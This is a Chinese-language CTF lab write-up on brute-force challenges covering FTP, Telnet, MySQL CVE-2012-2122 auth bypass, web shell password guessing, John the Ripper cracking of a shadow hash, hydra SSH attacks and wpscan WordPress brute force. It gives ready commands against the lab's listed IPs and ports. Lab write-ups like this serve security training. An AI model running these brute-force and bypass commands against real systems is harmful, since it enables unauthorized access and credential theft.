安鸾靶场--暴力破解

ftp服务破解

给出了IP,还提供了一个字典文件，直接拿这个字典来爆破就完事儿了(但是这里只提供密码呀，所以得自己找常见用户名字典了)。

使用超级弱口令爆破工具

直接爆破

得到账号密码后，使用浏览器登录ftp服务器

下载flag文件获取flag

Telnet服务破解

使用kali系统自带得hyrad工具，暴力破解telnet账号密码

​

回到win系统，打开命令窗口

telnet www.whalwl.fun 2323

Mysql暴力破解

        初看题目，发现是暴力破解，然后我果断运用了kali的hyrad工具，发现爆破失败。哎，这不是暴力破解吗？于是我又回来仔细看了一下题目，发现题目提示：利用mysql漏洞

上网查了查，发现是Mysql 身份认证绕过漏洞（CVE-2012-2122）

简介：当连接MariaDB/MySQL时，输入的密码会与期望的正确密码比较，由于不正确的处理，会导致即便是memcmp()返回一个非零值（memcmp函数主要是用来对比字符串的），也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名，不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。

这里我 运用两种方法进行漏洞利用。

第一种：打开kali采用msfconsole中的模块进行漏洞验证，然后解hash就可以看到密码，得到密码后，可以利用数据库连接工具进行连接（这里我不做演示）

使用命令：
msfcnsole        #进入msf模块
use mysql_authbypass_hashdump   #使用漏洞工具模块
show options      #查看选项
set RHOSTS   118.190.133.35   #设置目标ip
set RPORT    3308             #设置目标端口
run                           #执行

第二种方法：利用for循环，不断的向目标发送请求。

for i in `seq 1 1000`; do mysql -uroot -p123456 -h 118.190.133.35 -P3308 ; done

寻找flag

登陆表单破解

下载提供的用户密码，分别爆破用户密码，然后登录即可

一句话密码破解

        这里一句话破解是破解网站shell密码，所以得到网址后，我们扫描一下目录，发现存在robots.txt文件，我们打开看一下，发现存在许多文件，我发现/.webconsole.php文件最可疑，我们就从这个开始破解shell密码。这里使用到的工具是K8_FuckOneShell(扫描shell密码)下载地址：K8tools/K8_FuckOneShell_20161224%5BK.8%5D.rar at 78dd750a11258b803c2a0f1a2dcdcbffc1834148 · fan-ch/K8tools · GitHub然后我们下载靶场提供的字典，把字典粘贴到K8_FuckOneShell同文件目录下。

得到密码后，我们用菜刀连接一下看看，在根目录找到flag

SSH离线破解

我们利用john工具进行破解。

john工具介绍：John the Ripper是一个流行的口令破解工具，它支持Windows和Linux平台，是一个开源软件。

常用命令：
john --wordlist=./dict.txt ./shadow -->指定字典dict.txt爆破shadow文件。
john ./shadow	-->不指定字典，直接拿john提供的字典来爆破shadow文件。
john --show ./shadow -->查上次爆破结果，在shadow文件中。

/etc/shadow 文件，用于存储 Linux 系统中用户的密码信息，又称为“影子文件”，并且只有 root 用户拥有读权限，其他用户是没有任何权限的。

我们使用root用户查看一下shadow文件

shadow文件中每行代表一个用户，同样使用 ":" 作为分隔符，不同之处在于，每行用户信息被划分为 9 个字段。每个字段的含义如下：

用户名：加密密码：最后一次修改时间：最小修改时间间隔：密码有效期：密码需要变更前的警告天数：密码过期后的宽限时间：账号失效时间：保留字段

具体shadow文件解析请看：Linux /etc/shadow（影子文件）内容解析（超详细）

我们下载靶场提供的字典，分析shadow文件，test是用户名，从$6$看出他是通过SHA-512来进行加密的

test:$6$Vt6D0jvyawaHX1mT$7mD9IvHMBm3jhaEv5H5euXSeqEx1s1TzRCfe7FxMcDU5w2HFpvpUloseOSawFWg81oqp4qU2EWUMGuDNSFZeu.:18833:0:99999:7:::

然后我们使用命令破解（自行百度安装john工具）

第一步破解密码
john --w:john_dict.txt --format=sha512crypt shadow       
--w：表示字典文件
--fromat：表示预定义密码破解的类型 DES/BSDI/MD5/BF/AFS/LM/
sha512crypt：表示SHA512散列的密码，用于解密
第二步查找密码
备注：破解过的用户的密码保存在/home文件夹下的隐藏文件./john/john.pot里

cat /home/kali/.john/john.pot

使用kali连接服务器，发现连接不成功，不知道为啥。

然后换finalshell或者xshell登录。

使用命令find / "*this_is_flag*" 查找flag，使用命令cat /this_is_flag

john是离线爆破，

我们也可以使用hydra在线爆破，我们只需密码字典够大就可以爆破(题目提示我们不能在线爆破，服务器抗不住，但是我们可以把线程调到最小嘛)

hydra命令：

hydra -l test -P ./pass.txt ssh://118.190.133.35:22000

wordpress后台破解

尝试用burp爆破，发现爆破一段时间后状态马变成500了，说明使用burp爆破行不通。

于是我们使用工具wpscan来进行破解。

wpscan工具简介：

WPScan是Kali Linux默认自带的一款漏洞扫描工具，它采用Ruby编写，能够扫描WordPress网站中的多种安全漏洞，其中包括WordPress本身的漏洞、插件漏洞和主题漏洞。

常见用法：

wpscan --update           #更新到最新版本
wpscan --url  http://xxxx.com    #扫描网站
wpscan --url  http://xxxx.com  --enumerate -u   #枚举wordpress用户名
#--enumerate | -e [option(s)] 枚举
u 枚举用户名，默认从1-10
u[10-20] 枚举用户名，配置从10-20
p 枚举插件
vp 只枚举有漏洞的插件
ap 枚举所有插件，时间较长
tt 列举缩略图相关的文件
t 枚举主题信息
vt 只枚举存在漏洞的主题
wpscan  --url http://xxxx.com --username '用户名' -P 字典.txt  #已知用户名，使用字典爆破密码
wpscan  --url http://xxxx.com  -P password.txt -U username.txt  #同时爆破用户名及密码

拿着账号密码去登录即可拿到flag。